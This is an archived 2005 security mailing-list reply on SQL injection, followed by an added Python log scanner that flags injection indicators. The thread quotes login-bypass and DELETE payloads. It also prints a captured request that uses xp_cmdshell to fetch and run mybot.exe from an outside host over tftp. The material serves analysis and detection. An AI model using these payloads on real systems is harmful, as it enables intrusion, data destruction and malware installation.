WebApp Sec mailing list archives
Re: SQL injection
From: James Riden <j.riden () massey ac nz>
Date: Wed, 19 Jan 2005 20:34:16 +1300
"Francesco" <francesco () blackcoil com> writes:
> I have just discovered that I can successfully inject the following SQL:
>
>     ' OR 1=1; --
>
> into the Username field of a logon form on a "secure" site in my corporate network (Windows 2000, SQL 7.0). When I do this, leaving the password field blank, I am logged into the system as the first user in the "Users" table in the DB which is being authenticated against. LOL.
>
> If I can get that far, can't I theoretically:
>
>     ' OR 1=1; DELETE Users; --
>
> or something similar? Couldn't I EXEC some system sprocs this way too? How much damage/rooting can be done here? I need to present a detailed report to the admins.
Captured here - unsuccessful incidentally - an attack from 24.1.xx.yy:

    GET /foo.asp?bar=baz';%20exec%20master..xp_cmdshell%20'tftp%20-i%2024.1.xx.yy%20get%20mybot.exe%20C:%5Carcld.exe'-- HTTP/1.1

(The '..' between 'master' and 'xp_cmdshell' is 2E 2E hex.)

I don't know what mybot.exe was, but it's probably not good :)

cheers,
 Jamie

-- 
James Riden / j.riden () massey ac nz / Systems Security Engineer
GPG public key available at: http://www.massey.ac.nz/~jriden/
This post does not necessarily represent the views of my employer.
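A log-side check for the kind of request captured above, added here as an example and not part of this post or of anything the list members wrote: it URL-decodes each query parameter of a logged request line and flags the indicators the thread discusses (a stacked statement after `;`, the `--` comment terminator, the always-true `' OR 1=1` clause from the logon test, and `EXEC master..xp_*`). The sample request lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample request lines: the first repeats the attempt quoted in the
# post above, the second encodes the logon-form probe from the original question
# as a query string, the third is ordinary traffic.
SAMPLE_REQUESTS = [
    "GET /foo.asp?bar=baz';%20exec%20master..xp_cmdshell%20'tftp%20-i%2024.1.xx.yy"
    "%20get%20mybot.exe%20C:%5Carcld.exe'-- HTTP/1.1",
    "GET /logon.asp?username=%27%20OR%201%3D1%3B%20--&password= HTTP/1.1",
    "GET /foo.asp?bar=baz HTTP/1.1",
]

# Patterns applied to each URL-decoded, lower-cased parameter value.
INDICATORS = {
    "tautology": re.compile(r"'\s*or\s+\d+\s*=\s*\d+"),          # ' OR 1=1 style always-true clause
    "comment_terminator": re.compile(r"--"),                      # T-SQL comment discarding the rest of the query
    "stacked_statement": re.compile(r";\s*(?:--|\w)"),            # ; followed by another statement or a comment
    "extended_sproc": re.compile(r"\bxp_\w+"),                    # SQL Server extended stored procedure names
    "exec_master": re.compile(r"\bexec(?:ute)?\s+master\s*\.\."), # EXEC master..<procedure>
}

def decode_params(request_line):
    """Return {name: decoded value} for the query string of an HTTP request line."""
    # Split pairs on '&' only, so the ';' inside the captured value stays in that value.
    _method, target, _version = request_line.split(" ", 2)
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote_plus(name)] = unquote_plus(value)
    return params

def scan_request(request_line):
    """Return the sorted indicator names matched in any parameter of one request."""
    hits = set()
    for value in decode_params(request_line).values():
        text = value.lower()
        hits.update(name for name, pat in INDICATORS.items() if pat.search(text))
    return sorted(hits)

def scan_log(request_lines):
    """Return [(request_line, hits)] for requests that matched at least one indicator."""
    scanned = [(line, scan_request(line)) for line in request_lines]
    return [(line, hits) for line, hits in scanned if hits]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_REQUESTS):
        print(", ".join(hits), "<-", line)
```

The patterns are deliberately narrow so they match the decoded value rather than the raw `%20`-encoded log text; run the decode step before any signature check or the `exec master..` form is never seen.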